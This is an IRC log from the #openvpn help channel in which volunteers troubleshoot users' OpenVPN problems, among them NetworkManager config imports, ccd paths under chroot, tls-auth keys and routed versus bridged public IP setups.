#openvpn 13:18 -!- takamich_ [~private@c101-159.i07-26.onvol.net] has quit [Client Quit] 13:19 -!- takamich_ [~takamichi@c101-159.i07-26.onvol.net] has joined #openvpn 13:20 -!- takamich_ [~takamichi@c101-159.i07-26.onvol.net] has quit [Client Quit] 13:27 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 13:27 -!- mode/#openvpn [+v s7r] by ChanServ 13:33 -!- wachpwnski [~Adium@c-67-176-229-52.hsd1.in.comcast.net] has joined #openvpn 13:34 < wachpwnski> Hey guys, I have an open vpn config file but everything doesn't transfer over when I import it into gnome network manager 13:35 < wachpwnski> 
Apparently I actually need the key files from the config, because it won't parse them out. 13:37 <@krzee> i dont know much about the importer in nm, we generally say not to use it, however importing your already working config is 1 way i would say its fine to use 13:38 <@krzee> you could try in-line configs 13:38 <@krzee> !inline 13:38 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 13:38 < pekster> Unless you mean you have an inline config and nm won't take it? I can't quite tell what your issue is (or, more accurately, nm's issue) 13:38 < pekster> Also, holy crap git is awesome 13:39 < pekster> I'm hacking on easy-rsa a bit, and just discovered how powerful 'git stash' is. svn has no analogous feature 13:40 <@krzee> i think he means he has files that arent being found by the importer 13:40 <@krzee> maybe it needs to be in the same dir as config, maybe it needs to be a full path, i dunno 13:41 <@krzee> those are 3 things ild try, and im very sure 1 of them would work 13:41 < wachpwnski> krzee: yah, it's an inline config. so can I just copy paste the cdata to a file then? 13:41 < wachpwnski> then import that into nm? 13:41 <@krzee> ahh good call pekster! 13:42 < wachpwnski> It takes most of it, just requires a CA and Keyfile 13:42 < wachpwnski> which is inline on the config 13:42 <@krzee> ahh ok ya just put that data into a file and use config options ca / key 13:43 <@krzee> backup your config first! 13:43 < pekster> (no brackets, and quote the path if you have spaces in it, for some odd reason) 13:44 < wachpwnski> anything right of # is a comment correct?
13:44 <@krzee> yes 13:44 <@krzee> !comment 13:44 <@vpnHelper> "comment" is you can use ; or # to make comments in the config file 13:45 -!- mndo [~mndo@bl17-91-212.dsl.telepac.pt] has quit [Quit: going home] 13:45 < baobeiiii> pekster, nice, removing the stupid email fields etc? 13:46 < pekster> Indeed 13:47 < pekster> And getting used to git while I'm at it. I don't really have a good handle on what I'm doing yet, but I feel wickedly powerful anytime I ask git to do something. It's fast, lightweight, and actually helps development versus gets in the way 13:47 * pekster has a new SCM toy to play with now 13:49 < baobeiiii> interesting, googled it 13:49 < baobeiiii> amazon has a free book for download called pro git 13:50 -!- feth [~feth@ile-flottante.tuttu.info] has joined #openvpn 13:50 < feth> Hi 13:50 < pekster> It's been out for a number of years, I just was stuck in my stubborn ways of svn until this week 13:53 < feth> I'm having trouble with the ccd-exclusive directive on debian: I configured the ccd to be /etc/openvpn/ccd, and put files named according to the cnames in it, with nobody:nogroup 13:53 < baobeiiii> what other if any changes are you planning on making to easy-rsa? 13:53 < baobeiiii> its good, it's the only tool i have the competence to use lol 13:53 <@krzee> feth what are the permissions on the ccd dir? 13:54 < feth> krzee: drwxr-xr-x 2 nobody nogroup 1024 21 févr. 20:54 /etc/openvpn/ccd/ 13:54 <@krzee> dont want +w, but thats not the problem 13:55 <@krzee> pastebin me ls -l /etc/openvpn/ccd/ 13:55 <@krzee> unless its like 3 lines or less 13:55 < feth> the error is TLS related? Thu Feb 21 19:39:36 2013 us=620715 83.167.32.54:1194 TLS Auth Error: --client-config-dir authentication failed for common name 'mglmac26.mgl7.fr' file='/etc/openvpn/ccd/mglmac26.mgl7.fr 13:55 < pekster> baobeiiii: Nothing is changing for now except development builds, and even that's not official until they get merged/accepted upstream.
And nothing's getting harder to use (easier actually with less crap to fill out) 13:55 < feth> krzee: it's only 1 line: ifconfig-push 10.100.0.26 10.100.0.1 13:55 <@krzee> and pastebin the server config with no comments 13:56 <@krzee> feth, i said ls -l not cat 13:57 < feth> krzee: ups. 13:57 < feth> the server: http://pastebin.com/TVRASdE5 13:57 < feth> the ccd: -rw-r--r-- 1 nobody nogroup 37 21 févr. 20:28 mglmac26.mgl7.f 13:57 < feth> r 13:58 <@krzee> im betting its the chroot 13:58 <@krzee> mv ccd server/ 13:58 < feth> got it also! 13:58 <@krzee> and change ccd line to be /ccd 13:58 < feth> yup 13:58 < feth> thanks, I had it in front of me 13:59 <@krzee> np, you prolly wanna fix that for other files too 13:59 < feth> couldn't see it though 13:59 <@krzee> such as ipp if you really want that 13:59 <@krzee> !ipp 13:59 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address.
If you want guaranteed assignment, see !iporder and !static 13:59 < feth> krzee: tru 13:59 <@krzee> and logfiles 14:00 < wachpwnski> rats, i extracted all the keys and my vpn connection still fails 14:00 <@krzee> i believe --tls-server is already part of --server 14:00 <@krzee> you're using the default cipher so dont need to specify 14:00 < feth> surprisingly, the log works 14:01 <@krzee> not running scripts, prolly dont want script-security 14:01 < feth> true, also 14:01 <@krzee> never want verb 10 14:01 < feth> I wanted to push weird routes, but found out it was ccd that I needed 14:01 < feth> krzee: I was debugging :) 14:01 <@krzee> 3 is fine for every way, 5 for debug 14:01 <@krzee> s/way/day/ 14:02 < feth> ack 14:02 <@krzee> 10 is way too hardcore for me to look at ;] 14:02 < pekster> verb levels higher than 5 are only useful if you're debugging at the source-code level 14:02 < feth> I'm very happy that you're so helpful :) 14:02 < feth> it's rare ! 14:03 < feth> krzee: I don't look at logs, I gerp them :) 14:03 < feth> grep 14:04 < pekster> Unless you're specifically asked for higher verbosity, no one here really wants to see logs higher than 4 (or sometimes 5 to identify/rule-out firewall issues) 14:08 < wachpwnski> am I supposed to include the —— BEGIN part in the keyfiles? 14:08 < kisom> Anyone else getting lots of "Authenticate/Decrypt packet error: bad packet ID" since upgrading to 2.3.0? 14:11 < pekster> wachpwnski: Yes, that's a required part of the key file (and the ending lines.) Text before/after that point is ignored 14:12 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has quit [Changing host] 14:12 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 14:12 -!- mode/#openvpn [+o novaflash] by ChanServ 14:13 < pekster> kisom: My offhand guess for that would be mis-matched comp-lzo settings.
That setting must be identical between peers, including any parameter after the directive 14:14 < kisom> pekster: comp-lzo is exactly the same on both sides. This setup used to work perfectly until I upgraded to 2.3. Anyways, I'm gonna try and disable lzo altogether and see if it works better. 14:16 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Quit: Leaving] 14:16 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 14:21 -!- Shway [~Shway@216.208.252.66] has joined #openvpn 14:21 < wachpwnski> check this out: Key file 'static.key' used in --tls-auth contains insufficient key material [keys found=1 required=2] -- try generating a new key file with 'openvpn --genkey --secret [file]', or use the existing key file in bidirectional mode by specifying --tls-auth without a key direction parameter 14:22 < pekster> Older versions used smaller key sizes, and depending on your crypto settings, you may need more bits, especially when used in 4 parts with a directional setup 14:23 < pekster> See --secret in the manpage for a more detailed description 14:24 < wachpwnski> Can I convert my current key? 14:24 < wachpwnski> the sucky part is openvpn —config client.ovpn works fine 14:24 < pekster> No. Either use single-directional keys, or generate a new one 14:24 < wachpwnski> but nm is just being lame 14:25 < pekster> Are you not using a directional parameter on the client side? 14:25 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 14:25 < pekster> Oh, same config, same host, nm versus console? Interesting. the secret.key file is 1024-bit size? not 2048? 14:25 < wachpwnski> Under tls auth, i set keyfile to the v1 openvpn key and set key direction to 1 just like in the config 14:26 -!- baobeiiii [~baobeiiii@180.155.14.35] has joined #openvpn 14:26 < wachpwnski> it's also saying in the logs: WARNING: file 'client.key' is group or others accessible 14:27 < pekster> So fix it...
14:27 < wachpwnski> should I set that to 400 or something? 14:27 < pekster> Yup 14:27 < pekster> 600 is fine too 14:28 < pekster> It's non-fatal, but it's bad practice to have sensitive files open to other users 14:28 < pekster> You wouldn't leave your wallet out in the company kitchen, even if you mostly trust your co-workers 14:28 < wachpwnski> true 14:29 < wachpwnski> so when i change key direction parameter to none or 0 it times out 14:30 < pekster> That's expected behaviour. Manpage knows why under --tls-auth 14:30 < pekster> (which will redirect you to --secret, which I believe I've already mentioned) 14:31 < wachpwnski> looks like I'm stuck using the console for now 14:32 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 14:32 < pekster> networkmanager simply has a crappy openvpn implementation. I'm sure they'd accept patches, but I haven't heard that many good stories from people trying to use it. I used it all of once years ago and swore it off then 14:33 < wachpwnski> Any other options ? 14:33 < pekster> I put buttons to a shell script to start/stop the VPN in my menubar if I need a GUI launcher 14:33 < pekster> Then again, I tend to have at least 2 terms open each running screen, so I just run openvpn from the console most of the time anyway 14:34 < wachpwnski> off topic, but do you know how to auto respond with a user name and a password in a bash script? 14:35 < pekster> Look up the 'expect' package, then ask yourself if you really want to be doing that 14:35 < pekster> Other way around perhaps ;) 14:35 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 14:35 <@ecrist> wachpwnski: openvpn allows you to put user/pass in a file 14:36 < pekster> If that's the use-case, yes. Of course, if you're not using the user/pass auth mechanism, doing so really isn't any better than leaving your private key unencrypted anyway 14:36 < wachpwnski> oh...
14:37 < wachpwnski> sadly my user pass is something that is non-human maintainable 14:37 < kisom> pekster: The issue with bad packets didn't have anything to do with lzo. I disabled it all together and the client still reports bad packets, both on Windows and Linux. http://pastebin.ca/2316439 See line 254 14:37 < wachpwnski> I would rather monitor my computers access and key my drive encrypted 14:38 < wachpwnski> ecrist: what do i put in the config for my user and pass? 14:40 < pekster> kisom: What verb level is that? Too high of a verb level and it's actually going to interfere with normal operation as it writes so much to disk and generates many dozens of interrupts for every packet processed 14:41 -!- medum [kevin@whore.n2l.org] has joined #openvpn 14:41 < pekster> kisom: If you're not a developer working to debug a very specific problem in the source code, stop using anything higher than verb 4 for your daily operation 14:41 < kisom> pekster: verb 13. But it doesn't matter, if I use verb 3 I get all the same error. 14:41 < pekster> Well, that high of a verbosity is hiding potentially useful messages at verb 4, such as a backtrack window warning 14:42 < kisom> I checked for that, there are no warnings at all. 14:42 < kisom> MTU is consistent, so is lzo 14:42 -!- mirco [~mirco@p50806731.dip.t-dialin.net] has joined #openvpn 14:44 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 14:46 < pekster> Then I'm not sure what to suggest. Maybe test crypto on both ends with the same cipher you're using (ie: openvpn --test-crypto --cipher $c --keysize $s --secret k.key) 14:47 -!- Xgates [~Xgates@unaffiliated/xgates] has joined #openvpn 14:47 < pekster> Could be packet mangling too between peers, or hardware (CPU/NIC) issues too 14:47 < Xgates> hi guys 14:47 < kisom> My gut feeling tells me that the Arch package is broken. I'll try and recompile from scratch and then submit a bug report to whoever is responsible. 
14:48 < pekster> Are you using any screwy CFLAGS or optimizations? 14:48 < kisom> No, I use vanilla 14:48 < pekster> Try with something standard like just "-O2 -march=native" or something. Could be openssl at fault too since openvpn is heavily bound to it for crypto ops 14:49 < kisom> Hmm, might as well try and change ciphers. I recently upgraded OpenSSL so it might have something to do with it 14:49 < Xgates> when I use OpenVPN on a supported smart phone that can use OpenVPN Connect, I feel more comfortable with this, instead of using L2TP, because with L2TP your storing a password and secret on the device, whereas with OpenVPN Connect you import your actual certs & keys which to me seems better/safer? Any thoughts on that? 14:52 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 14:55 -!- dazo_afk is now known as dazo 15:02 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 15:05 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has joined #openvpn 15:32 < kisom> This is getting all crazy. The connection works great when using UDP, but not when using TCP. 15:33 < kisom> Makes no sense. 15:37 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:37 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 15:38 -!- wachpwnski [~Adium@c-67-176-229-52.hsd1.in.comcast.net] has left #openvpn [] 15:42 -!- medum [kevin@whore.n2l.org] has left #openvpn [] 15:48 < Xgates> any thoughts here on L2TP vs OpenVPN Connect? 15:48 < Xgates> security wise, etc.... 15:49 < kisom> Xgates: OpenVPN Connect works better imo. 15:49 < kisom> It also retains the connection after the device wakes up from sleep 15:50 < Xgates> well I figured it's more secure, don't like the idea of adding in a password and secret on the phone being stored, rather import the actual certs & keys, seems more secure, but not sure... 15:50 < kisom> Doesn't matter. The private key is still stored at the phone. 
15:50 < Xgates> hmm 15:52 < Xgates> thanks, gotta run... 15:52 -!- Xgates [~Xgates@unaffiliated/xgates] has quit [Quit: Xgates] 15:52 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection] 15:56 -!- p3rror [~mezgani@41.249.81.68] has joined #openvpn 15:57 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has joined #openvpn 16:06 < leg3nd> afternoon everyone, I am currently trying to get my VPN functioning on my Ubuntu virtual machine. I had this configuration on another (non-vm) before and it worked fine, yet now I am unable to access the hosts within the VPN network when connected. The authentication phase works fine, and the interface opens, I am able to ping the VPN server but not any other hosts. More information: http://paste.pound-python.org/raw/6pCUqRCSVryk6wrWrYCq/ - I apprec 16:06 < leg3nd> iate any tips. 16:11 < pekster> leg3nd: You shouldn't push the network range for the local VPN network in a bridged setup like that as the client has a link-local route when the address is added 16:12 < leg3nd> pekster, I have tried it without the push options as well but to no avail. 16:12 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 16:12 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 16:13 < pekster> Where's the client connecting in from? 16:16 < leg3nd> pekster, Just tested it without the option again - same result. 16:16 < pekster> Well, regardless you don't want to push the network range you're on-link with 16:17 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 16:17 < pekster> What's the purpose of 'redirect-gateway' ? You really want to take your VPN client's default gateway and send it to a VM inside an ESX network? 16:18 < pekster> Hence the curiosity of where the native client is relative to your LAN 16:19 -!- Shway [~Shway@216.208.252.66] has quit [Quit: Want to be different?
Try HydraIRC -> http://www.hydrairc.com <-] 16:19 < leg3nd> Ideally, but not a big deal either way. 16:20 < leg3nd> The client is connecting is on an external network with no egress firewall rules, I would like the redirect-gateway to secure the traffic in certain use cases. Here is some client debug info: http://paste.pound-python.org/show/MLyszBdltTV1RJTOxfoW/ 16:22 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Quit: Leaving, Ya'LL!] 16:22 < pekster> You have mis-matched comp-lzo settings; the client has 'yes' while the server is implicitly using the default 'adaptive' mode 16:22 < pekster> You should match this on both your peers 16:23 < leg3nd> Okay, thanks. Let me give that a try. 16:23 < pekster> That's not the cause of your issue though 16:23 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 16:23 < leg3nd> Okay 16:23 < pekster> Looks like you have a problem getting to the gateway environment based on the routing table on the client 16:23 <@dazo> comp-lzo adaptive and comp-lzo yes are compatible 16:24 <@dazo> I even think comp-lzo no is compatible too ... but not having --comp-lzo at all, will not be compatible 16:24 < pekster> Your default route is via the server's IP, but the only route it has to get there is via tap0 16:25 < kisom> pekster: After compiling OpenVPN on several systems and with different OpenSSL versions I can confirm that the bug really is within openvpn :) 16:25 < pekster> leg3nd: Oh, I'm sorry, I missed your remote statement. Nevermind, if 192.168.1.254 is your client's physical gw, you're good 16:25 < kisom> Whatever, I'll rollback to 2.2.
16:25 < leg3nd> yeah that is the physical client GW 16:26 < leg3nd> it seems to be routing out of the client network without issues 16:26 < pekster> I'd try tcpdumping on the br0 interface on the server 16:26 < pekster> I'm wondering if ESX isn't doing something odd with the packets via its own filtering mechanism 16:26 < leg3nd> yeah thats kinda what i was thinking 16:27 < leg3nd> i couldnt seem to find any issues with ESX, but I'll look a little deeper. 16:28 < pekster> That setup looks fine, and with the route for 192.168.254.0/24 via tap0 (ie: the link route) it's going to make an on-link request for the IP: ie: ARP, ARP-reply, then send the ping. Watch for each phase of that process. If you don't see it on br0, try dumping on tap0 on the server, then on the tap0 on the client. Somewhere it has to be getting dropped (or the reply dropped, perhaps) 16:28 < pekster> FYI, on Linux the tools 'ip route show' and 'ip addr show' for routing and addressing are shorter and more informative (it won't help here, but in the future those are the preferred tools) 16:31 < pekster> kisom: Can't speak to your particular situation, but it's not an overall flaw in how 2.3.0 works since many other environments are just fine with the 2.3.x series. I've been using the rc builds and now the official 2.3.0 build on Windows and 3 Linux distros without issue. It's odd to blame openvpn specifically since a crypto failure is likely to be occurring in libopenssl specifically; I'm sure the openvpn devs would love a detailed ... 16:31 < pekster> ... 
bugreport if you have actually traced it to a bug "really" within openvpn so they can fix it 16:32 < pekster> That's the funny thing about dynamic linking 16:33 -!- sw0rdfish is now known as Guest40293 16:33 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 16:33 < leg3nd> alright ill give that a try, just talked to a coworker about it and he said there could be an issue with the ESXi configuration possibly also, so i'll check both out. 16:33 < leg3nd> thanks for the help pekster 16:33 < kisom> pekster: Care to try and reproduce the bug? I've done it on both Ubuntu and Arch on 2.3.0. 16:37 < pekster> Reproduce it how? All you've suggested is that mysteriously upgrading to 2.3.0 breaks things. I've refuted that by the hundreds of people not you that are running it without issue. Proof by counter-example 16:37 < kisom> pekster: That's because I haven't told you. 16:37 < pekster> Right. 16:37 < kisom> Use tcp-server and send packets in a higher rate than the network supports. 16:38 < kisom> I just UDP-flooded the host over the VPN connection. 16:38 < kisom> Well, actually I flooded the client from the server. 16:38 < pekster> What's your queue length on both the virtual and physical adapters, and any special qdiscs? 16:39 < kisom> 1000 on both 16:40 < kisom> I tried compiling both 2.3 and 2.2 on both systems. 2.2 handles the flood without issues. 16:40 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has quit [Ping timeout: 276 seconds] 16:40 < kisom> And no, no special qdiscs. Both systems are pretty much vanilla. 16:41 -!- Guest40293 [sw0rdfish@unaffiliated/sw0rdfish] has quit [Quit: Leaving, Ya'LL!] 16:45 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has joined #openvpn 16:45 < leg3nd> pekster, the client doesn't seem to be getting ARP replies for the gateway (192.168.254.1) - but there are replies for the VPN server (251) and the client (26).
- http://paste.pound-python.org/show/DWqirK6LM25wvxUQDz5K/ 16:48 -!- MeanderingCode_ [~Meanderin@71-213-185-188.albq.qwest.net] has joined #openvpn 16:49 -!- MeanderingCode [~Meanderin@71-213-185-188.albq.qwest.net] has quit [Ping timeout: 248 seconds] 16:50 < pekster> leg3nd: That's dumped from what device, the server's br0, or the client's tap0? 16:50 < leg3nd> server br0 16:50 < pekster> Sounds like an ESX thing then 16:50 < pekster> Pretty sure your vSwitch is hosing you 16:51 < DougEFresh> screen rocks 16:51 < leg3nd> actually it was server tap0 16:51 < leg3nd> but i think youre right 16:53 < pekster> There shouldn't be a difference unless there's crazy bridge-level filtering (ebtables & friends) 16:53 < pekster> It still has to go to the ESX vSwitch, and it can do (or drop) with it what it likes 16:54 < pekster> It's likely being too smart for its own good and stopping you from doing a bridge. You could route instead which might work better 16:54 < pekster> !tunortap 16:54 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 16:54 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
16:54 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn 16:57 -!- sw0rdfish- [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn 16:57 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has quit [Ping timeout: 256 seconds] 16:57 -!- sw0rdfish- [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host] 16:57 -!- sw0rdfish- [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 16:59 < neilhwatson> Hello, I'm trying to get an openvpn tunnel that redirects the default gateway. The client logs show this error: 16:59 < neilhwatson> NOTE: unable to redirect default gateway -- VPN gateway parameter (--route-gateway or --ifconfig) is missing 17:00 < neilhwatson> Is the trouble on the server or the client? 17:00 < pekster> Clearly the client. You can't redirect a gateway if you don't tell the client what that gateway is; push the required directive from the server or define it on the client using the listed parameter 17:01 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 17:02 < neilhwatson> I have this in the server config: "push "redirect-gateway def1" and "pull" in the client config. What did I miss? 17:03 <@krzee> !configs 17:03 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 17:07 < neilhwatson> Here they are: https://gist.github.com/neilhwatson/5009289 17:07 <@vpnHelper> Title: Open vpn configs (at gist.github.com) 17:09 -!- sw0rdfish- is now known as sw0rdfish 17:14 < neilhwatson> server version 2.1.3, client version 2.2.1. 17:14 < pekster> You should follow the howto. 
You can't push a public IP when your server is using an rfc1918 IP, at least not without using 'mode p2p' instead of the default net30 (you probably don't want to do this anyway.) You aren't assigning your client an IP or pushing one, and you haven't pushed a gateway IP 17:15 < pekster> There's quite a bit wrong with the addressing in that setup 17:15 < pekster> !howto 17:15 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 17:15 < pekster> Don't even try to get the gateway redirection set up until you can ping the server's VPN IP from your client. Until you can do that, you don't actually have a working VPN tunnel 17:16 < neilhwatson> 10.0.0.1? I can ping that. 17:17 < pekster> Then why does line 31 say "public IP" ? 17:17 < pekster> 10.0.0.2 is not a public IP 17:17 < neilhwatson> It's not 10.0.0.2. It is a public IP. I removed it for the public paste. 17:19 < pekster> You've manually set up the addressing on the client? 17:19 -!- erry [erry@freenode/staff/erry] has quit [Quit: Segmentation fault] 17:20 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 17:20 -!- erry_ is now known as erry 17:21 < neilhwatson> I don't think so. I believe line 31 does that. 17:22 < pekster> on the server, yes. 17:23 < pekster> How has your *client* been configured to use the correct addressing? 17:23 < neilhwatson> Sorry, I don't follow you. 17:23 < pekster> How has tun0 been configured? 17:23 < pekster> You are not pushing the IP from the server, and your client config does not use an ifconfig statement 17:24 < pekster> Are you manually invoking ifconfig or /sbin/ip on the client after you connect? Is tun0 already up and pre-populated with the addressing info? 17:26 < neilhwatson> I don't recall how I created tun0 initially.
Here is what it looks like: https://gist.github.com/neilhwatson/5009398 17:26 <@vpnHelper> Title: client tun0 (at gist.github.com) 17:26 < pekster> Ah, okay, so you've statically configured it. Then add the gateway (this is your point-to-point address of 10.0.0.1, or the server's IP) manually in your client config via 'route-gateway' 17:27 < pekster> Just like the client error message says 17:27 < pekster> You can't push options in a p2p setup like you have (that's only valid in 'mode server' which you are not using, apparently.) 17:28 < pekster> You can put 'redirect-gateway def1' in your client config though. Do that with the 'route-gateway' option and you should be set 17:28 < neilhwatson> Is mode server better? I'm all for doing it the standard way. 17:28 < pekster> Well, depends on what you want. You can't easily manage the public addressing like you have now in the server mode 17:29 < pekster> So if you have already handled your upstream routing to deal with sending the public IP to the server and the server firewall allows the forwarded traffic to the client, you might as well stick with what you have 17:29 < neilhwatson> OK. Thanks. I'll give it a go. 17:29 -!- MeanderingCode [~Meanderin@71-213-185-188.albq.qwest.net] has joined #openvpn 17:29 < pekster> If what I just said makes no sense to you, then you're going to be on your own because your setup is pretty complicated for what I think you're trying to do. Most people don't assign a p2p address with a public IP like you're doing 17:30 -!- MeanderingCode_ [~Meanderin@71-213-185-188.albq.qwest.net] has quit [Ping timeout: 244 seconds] 17:30 < pekster> I mean, it's valid to do this, it just requires everything to be routed in just the right way beforehand or it won't work 17:33 * pekster didn't actually know it was allowed to use X509/TLS in p2p mode, but apparently it is, since I was able to clone your setup and launch a service that way.
Go figure 17:35 < pekster> neilhwatson: Come to think of it, the pull/push might work too since there is actually a control channel. In that case you'd just need to do: push "route-gateway 10.0.0.1" 17:35 < pekster> I'm not actually sure offhand if that works or not 17:35 < neilhwatson> My goal is to give a computer with dynamic ISP IP a static IP from a remote server and tunnel all traffic through. How would you do it? 17:36 < pekster> No, that's a fine way to do it, assuming your public IP you've assigned the client is *routed* and not on-link (this is a very critical distinction) 17:36 < pekster> Is that the case? 17:36 < neilhwatson> How do I confirm that? 17:37 < pekster> What is the server? How did you get the "" address? 17:38 < neilhwatson> From the datacenter staff. 17:38 < pekster> Okay. And you have a separate IP that the server uses for its own uplink, right? 17:38 < neilhwatson> Yes 17:38 < neilhwatson> Networking hurts my brain at times. 17:38 < pekster> You still need this IP you're assigning the client routed, not on-link. I guess we'll know soon enough if it worked 17:39 < pekster> If you just got a "2nd IP" assigned on your Ethernet link, it's not routed, but expected to be on-link and respond to ARPs (which would mean you'd need to bridge with tap, not use tun) 17:39 < pekster> tun=routing, tap=bridging 17:40 < pekster> So, back to your original config, try just adding what I said earlier: push "route-gateway 10.0.0.1" 17:40 < pekster> Then reconnect the client 17:40 < pekster> See if that error goes away 17:40 < neilhwatson> Stand by 17:41 < kisom> pekster: Did you try and reproduce the issue I'm having with tcp-server? 17:41 -!- dazo is now known as dazo_afk 17:42 < pekster> kisom: Not yet. I'll poke at it and see what I find though; it sounds curious 17:43 < neilhwatson> Something went wrong. A new route was set but traffic did not seem to go anywhere. When I stopped the client the routing returned to what it was before.
17:44 < kisom> pekster: Roger. It seems flooding the server from the client side does not reproduce it, you must flood from the server side. 17:44 < pekster> Either a firewall problem, or this public IP is not routed to you neilhwatson 17:44 < neilhwatson> I cleared my fw rules to be sure. Client logs show this: 17:44 < neilhwatson> Feb 21 18:40:43 ettin ovpn-ettin[23549]: PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1,route-gateway 10.0.0.1' 17:44 < neilhwatson> Feb 21 18:40:43 ettin ovpn-ettin[23549]: OPTIONS IMPORT: route options modified 17:44 < neilhwatson> Feb 21 18:40:43 ettin ovpn-ettin[23549]: OPTIONS IMPORT: route-related options modified 17:44 < neilhwatson> Feb 21 18:40:43 ettin ovpn-ettin[23549]: ROUTE default_gateway=72.138.34.1 17:44 < pekster> neilhwatson: This server is Linux? Can you pastebin 'iptables-save -c' ? and the output of 'cat /proc/sys/net/ipv4/ip_forward' ? 17:45 < neilhwatson> Both hosts are linux 17:45 < pekster> Yea, so you're getting the push 17:45 < pekster> Let's look at the firewall and IP forwarding 17:45 -!- MeanderingCode [~Meanderin@71-213-185-188.albq.qwest.net] has quit [Ping timeout: 255 seconds] 17:46 < pekster> kisom: Yea. Might be a day or two (family stuff, and I stayed up way later than I should have last night hunting the last problem I was motivated to fix :) 17:46 < neilhwatson> ip_forward is 1 on both. Iptables are clear and default to accept. 17:46 < kisom> pekster: Not a problem. I'll write down the details so I can reproduce it later. 17:47 < kisom> Anyways, time to sleep. nn. 17:47 < pekster> neilhwatson: What do you mean 'clear'? iptables-save should still show you something even if there are no rules. Or do you mean your rules look *exactly* like this: http://paste.kde.org/677966/ 17:49 < neilhwatson> https://gist.github.com/neilhwatson/5009548 17:49 <@vpnHelper> Title: iptables (at gist.github.com) 17:50 < pekster> Looks like the 2nd IP on your server is on-link, not routed.
Tell upstream (your provider) you want it routed to the server's primary IP
17:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
17:50 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
17:51 < pekster> That, or create a bridge with tap0 and your existing public interface on the server, put your public IP on the bridge, and connect your VPN in tap mode to that bridge and set the IP that way on your client
17:51 < pekster> Both end up doing the same thing
17:52 < neilhwatson> That IP worked a few weeks ago as a different VM, which is now retired. Could the fact the server is a VM be an issue?
17:52 < pekster> It doesn't work because there's no link
17:52 < pekster> tun=routed
17:53 < pekster> If you don't understand the difference between a routed and bridged network, this entire setup is quite frankly beyond what you should be attempting to do
17:54 < pekster> You have 2 options, exactly as I said a moment ago: either tell your provider to route this 2nd IP to you via the server's primary IP, or use openvpn in tap mode and connect it to a bridge that you create on your server's upstream-facing interface
17:55 < pekster> Those are your only 2 options if you want the client to have a direct public IP
17:55 < neilhwatson> Let me think about it. Thanks for your help.
17:55 < pekster> Your 3rd option is to follow the classic howto guide online, give the client a private IP (rfc1918) and NAT the traffic
17:56 < pekster> If you choose to go that route (classic private IP space + NAT) these are the relevant guides as the setup is a bit more "standard" than the speciality setup you have now
17:56 < pekster> the basic howto is here:
17:56 < pekster> !howto
17:56 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT!
or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
17:56 < pekster> And a redirection setup on top of that is:
